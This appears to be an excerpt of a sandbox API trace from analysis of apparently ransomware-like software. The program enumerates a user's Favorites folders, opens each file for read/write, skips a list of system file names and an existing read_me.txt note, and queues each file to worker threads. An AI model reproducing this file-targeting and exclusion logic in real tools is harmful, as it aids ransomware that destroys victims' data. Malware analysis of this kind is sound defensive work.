lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0077.000] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 91 [0077.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0077.000] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="read_me.txt") returned 0x0 [0077.000] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="autoexec.bat") returned 0x0 [0077.000] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="desktop.ini") returned 0x0 [0077.000] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="autorun.inf") returned 0x0 [0077.000] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="ntuser.dat") returned 0x0 [0077.000] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="iconcache.db") returned 0x0 [0077.000] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="bootsect.bak") returned 0x0 [0077.000] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="boot.ini") returned 0x0 [0077.000] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="ntuser.dat.log") returned 0x0 [0077.000] StrStrW (lpFirst="ie site on microsoft.com.url", lpSrch="thumbs.db") returned 0x0 [0077.000] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 103 [0077.001] QueueUserWorkItem (Function=0x404e00, Context=0x7b8, Flags=0x0) returned 1 [0077.001] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0077.001] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url") returned 84 [0077.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0077.001] StrStrW (lpFirst="microsoft at home.url", lpSrch="read_me.txt") returned 0x0 [0077.001] StrStrW (lpFirst="microsoft at home.url", lpSrch="autoexec.bat") returned 0x0 [0077.001] StrStrW (lpFirst="microsoft at home.url", lpSrch="desktop.ini") returned 0x0 [0077.001] StrStrW (lpFirst="microsoft at home.url", lpSrch="autorun.inf") returned 0x0 [0077.001] StrStrW (lpFirst="microsoft at home.url", lpSrch="ntuser.dat") returned 0x0 [0077.001] StrStrW (lpFirst="microsoft at home.url", lpSrch="iconcache.db") returned 0x0 [0077.001] StrStrW (lpFirst="microsoft at home.url", lpSrch="bootsect.bak") returned 0x0 [0077.001] StrStrW (lpFirst="microsoft at home.url", lpSrch="boot.ini") returned 0x0 [0077.001] StrStrW (lpFirst="microsoft at home.url", lpSrch="ntuser.dat.log") returned 0x0 [0077.001] StrStrW (lpFirst="microsoft at home.url", lpSrch="thumbs.db") returned 0x0 [0077.001] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 104 [0077.001] QueueUserWorkItem (Function=0x404e00, Context=0x7a8, Flags=0x0) returned 1 [0077.001] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0077.001] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned 84 [0077.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7f0 [0077.002] StrStrW (lpFirst="microsoft at work.url", lpSrch="read_me.txt") returned 0x0 [0077.002] StrStrW (lpFirst="microsoft at work.url", lpSrch="autoexec.bat") returned 0x0 [0077.002] StrStrW (lpFirst="microsoft at work.url", lpSrch="desktop.ini") returned 0x0 [0077.002] StrStrW (lpFirst="microsoft at work.url", lpSrch="autorun.inf") returned 0x0 [0077.002] StrStrW (lpFirst="microsoft at work.url", lpSrch="ntuser.dat") returned 0x0 [0077.002] StrStrW (lpFirst="microsoft at work.url", lpSrch="iconcache.db") returned 0x0 [0077.002] StrStrW (lpFirst="microsoft at work.url", lpSrch="bootsect.bak") returned 0x0 [0077.002] StrStrW (lpFirst="microsoft at work.url", lpSrch="boot.ini") returned 0x0 [0077.002] StrStrW (lpFirst="microsoft at work.url", lpSrch="ntuser.dat.log") returned 0x0 [0077.002] StrStrW (lpFirst="microsoft at work.url", lpSrch="thumbs.db") returned 0x0 [0077.002] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 105 [0077.002] QueueUserWorkItem (Function=0x404e00, Context=0x7f0, Flags=0x0) returned 1 [0077.002] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0077.002] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 82 [0077.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7f4 [0077.003] StrStrW (lpFirst="microsoft store.url", lpSrch="read_me.txt") returned 0x0 [0077.003] StrStrW (lpFirst="microsoft store.url", lpSrch="autoexec.bat") returned 0x0 [0077.003] StrStrW (lpFirst="microsoft store.url", lpSrch="desktop.ini") returned 0x0 [0077.003] StrStrW (lpFirst="microsoft store.url", lpSrch="autorun.inf") returned 0x0 [0077.003] StrStrW (lpFirst="microsoft store.url", lpSrch="ntuser.dat") returned 0x0 [0077.003] StrStrW (lpFirst="microsoft store.url", lpSrch="iconcache.db") returned 0x0 [0077.004] StrStrW (lpFirst="microsoft store.url", lpSrch="bootsect.bak") returned 0x0 [0077.004] StrStrW (lpFirst="microsoft store.url", lpSrch="boot.ini") returned 0x0 [0077.004] StrStrW (lpFirst="microsoft store.url", lpSrch="ntuser.dat.log") returned 0x0 [0077.004] StrStrW (lpFirst="microsoft store.url", lpSrch="thumbs.db") returned 0x0 [0077.004] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 106 [0077.004] QueueUserWorkItem (Function=0x404e00, Context=0x7f4, Flags=0x0) returned 1 [0077.004] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16bcb890, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16bcb890, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16bcb890, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0077.004] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\read_me.txt") returned 74 [0077.004] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e4 [0077.004] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0077.004] CloseHandle (hObject=0x7e4) returned 1 [0077.004] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16bcb890, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16bcb890, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16bcb890, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0077.004] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0077.004] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\read_me.txt") returned 74 [0077.004] GetProcessHeap () returned 0x280000 [0077.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a900a8 | out: hHeap=0x280000) returned 1 [0077.004] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 61 [0077.004] GetProcessHeap () returned 0x280000 [0077.004] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b010e8 | out: hHeap=0x280000) returned 1 [0077.938] GetProcessHeap () returned 0x280000 [0077.938] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a60090 [0077.939] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*") returned 58 [0077.939] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16c3dcb0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16c3dcb0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b2478 [0077.939] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\.") returned 58 [0077.939] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16c3dcb0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16c3dcb0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0077.939] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\..") returned 59 [0077.939] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0077.939] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0077.939] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x820 [0077.940] StrStrW (lpFirst="msn autos.url", lpSrch="read_me.txt") returned 0x0 [0077.940] StrStrW (lpFirst="msn autos.url", lpSrch="autoexec.bat") returned 0x0 [0077.940] StrStrW (lpFirst="msn autos.url", lpSrch="desktop.ini") returned 0x0 [0077.940] StrStrW (lpFirst="msn autos.url", lpSrch="autorun.inf") returned 0x0 [0077.940] StrStrW (lpFirst="msn autos.url", lpSrch="ntuser.dat") returned 0x0 [0077.940] StrStrW (lpFirst="msn autos.url", lpSrch="iconcache.db") returned 0x0 [0077.940] StrStrW (lpFirst="msn autos.url", lpSrch="bootsect.bak") returned 0x0 [0077.940] StrStrW (lpFirst="msn autos.url", lpSrch="boot.ini") returned 0x0 [0077.940] StrStrW (lpFirst="msn autos.url", lpSrch="ntuser.dat.log") returned 0x0 [0077.940] StrStrW (lpFirst="msn autos.url", lpSrch="thumbs.db") returned 0x0 [0077.940] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 109 [0077.940] QueueUserWorkItem (Function=0x404e00, Context=0x820, Flags=0x0) returned 1 [0077.940] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0077.940] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0077.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x80c [0077.961] StrStrW (lpFirst="msn entertainment.url", lpSrch="read_me.txt") returned 0x0 [0077.961] StrStrW (lpFirst="msn entertainment.url", lpSrch="autoexec.bat") returned 0x0 [0077.962] StrStrW (lpFirst="msn entertainment.url", lpSrch="desktop.ini") returned 0x0 [0077.962] StrStrW (lpFirst="msn entertainment.url", lpSrch="autorun.inf") returned 0x0 [0077.962] StrStrW (lpFirst="msn entertainment.url", lpSrch="ntuser.dat") returned 0x0 [0077.962] StrStrW (lpFirst="msn entertainment.url", lpSrch="iconcache.db") returned 0x0 [0077.962] StrStrW (lpFirst="msn entertainment.url", lpSrch="bootsect.bak") returned 0x0 [0077.962] StrStrW (lpFirst="msn entertainment.url", lpSrch="boot.ini") returned 0x0 [0077.962] StrStrW (lpFirst="msn entertainment.url", lpSrch="ntuser.dat.log") returned 0x0 [0077.962] StrStrW (lpFirst="msn entertainment.url", lpSrch="thumbs.db") returned 0x0 [0077.962] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 110 [0077.962] QueueUserWorkItem (Function=0x404e00, Context=0x80c, Flags=0x0) returned 1 [0077.962] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0077.962] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0077.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x81c [0077.985] StrStrW (lpFirst="msn money.url", lpSrch="read_me.txt") returned 0x0 [0077.985] StrStrW (lpFirst="msn money.url", lpSrch="autoexec.bat") returned 0x0 [0077.985] StrStrW (lpFirst="msn money.url", lpSrch="desktop.ini") returned 0x0 [0077.985] StrStrW (lpFirst="msn money.url", lpSrch="autorun.inf") returned 0x0 [0077.985] StrStrW (lpFirst="msn money.url", lpSrch="ntuser.dat") returned 0x0 [0077.985] StrStrW (lpFirst="msn money.url", lpSrch="iconcache.db") returned 0x0 [0077.985] StrStrW (lpFirst="msn money.url", lpSrch="bootsect.bak") returned 0x0 [0077.985] StrStrW (lpFirst="msn money.url", lpSrch="boot.ini") returned 0x0 [0077.985] StrStrW (lpFirst="msn money.url", lpSrch="ntuser.dat.log") returned 0x0 [0077.985] StrStrW (lpFirst="msn money.url", lpSrch="thumbs.db") returned 0x0 [0077.985] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 111 [0077.985] QueueUserWorkItem (Function=0x404e00, Context=0x81c, Flags=0x0) returned 1 [0077.985] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0077.985] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0077.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x82c [0078.021] StrStrW (lpFirst="msn sports.url", lpSrch="read_me.txt") returned 0x0 [0078.021] StrStrW (lpFirst="msn sports.url", lpSrch="autoexec.bat") returned 0x0 [0078.021] StrStrW (lpFirst="msn sports.url", lpSrch="desktop.ini") returned 0x0 [0078.021] StrStrW (lpFirst="msn sports.url", lpSrch="autorun.inf") returned 0x0 [0078.021] StrStrW (lpFirst="msn sports.url", lpSrch="ntuser.dat") returned 0x0 [0078.021] StrStrW (lpFirst="msn sports.url", lpSrch="iconcache.db") returned 0x0 [0078.022] StrStrW (lpFirst="msn sports.url", lpSrch="bootsect.bak") returned 0x0 [0078.022] StrStrW (lpFirst="msn sports.url", lpSrch="boot.ini") returned 0x0 [0078.022] StrStrW (lpFirst="msn sports.url", lpSrch="ntuser.dat.log") returned 0x0 [0078.022] StrStrW (lpFirst="msn sports.url", lpSrch="thumbs.db") returned 0x0 [0078.022] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 112 [0078.022] QueueUserWorkItem (Function=0x404e00, Context=0x82c, Flags=0x0) returned 1 [0078.022] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0078.022] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned 64 [0078.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x818 [0078.022] StrStrW (lpFirst="msn.url", lpSrch="read_me.txt") returned 0x0 [0078.022] StrStrW (lpFirst="msn.url", lpSrch="autoexec.bat") returned 0x0 [0078.022] StrStrW (lpFirst="msn.url", lpSrch="desktop.ini") returned 0x0 [0078.022] StrStrW (lpFirst="msn.url", lpSrch="autorun.inf") returned 0x0 [0078.022] StrStrW (lpFirst="msn.url", lpSrch="ntuser.dat") returned 0x0 [0078.022] StrStrW (lpFirst="msn.url", lpSrch="iconcache.db") returned 0x0 [0078.022] StrStrW (lpFirst="msn.url", lpSrch="bootsect.bak") returned 0x0 [0078.022] StrStrW (lpFirst="msn.url", lpSrch="boot.ini") returned 0x0 [0078.023] StrStrW (lpFirst="msn.url", lpSrch="ntuser.dat.log") returned 0x0 [0078.023] StrStrW (lpFirst="msn.url", lpSrch="thumbs.db") returned 0x0 [0078.023] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 113 [0078.023] QueueUserWorkItem (Function=0x404e00, Context=0x818, Flags=0x0) returned 1 [0078.023] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0078.023] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned 71 [0078.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x814 [0078.068] StrStrW (lpFirst="msnbc news.url", lpSrch="read_me.txt") returned 0x0 [0078.068] StrStrW (lpFirst="msnbc news.url", lpSrch="autoexec.bat") returned 0x0 [0078.069] StrStrW (lpFirst="msnbc news.url", lpSrch="desktop.ini") returned 0x0 [0078.069] StrStrW (lpFirst="msnbc news.url", lpSrch="autorun.inf") returned 0x0 [0078.069] StrStrW (lpFirst="msnbc news.url", lpSrch="ntuser.dat") returned 0x0 [0078.069] StrStrW (lpFirst="msnbc news.url", lpSrch="iconcache.db") returned 0x0 [0078.069] StrStrW (lpFirst="msnbc news.url", lpSrch="bootsect.bak") returned 0x0 [0078.069] StrStrW (lpFirst="msnbc news.url", lpSrch="boot.ini") returned 0x0 [0078.069] StrStrW (lpFirst="msnbc news.url", lpSrch="ntuser.dat.log") returned 0x0 [0078.069] StrStrW (lpFirst="msnbc news.url", lpSrch="thumbs.db") returned 0x0 [0078.069] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 114 [0078.069] QueueUserWorkItem (Function=0x404e00, Context=0x814, Flags=0x0) returned 1 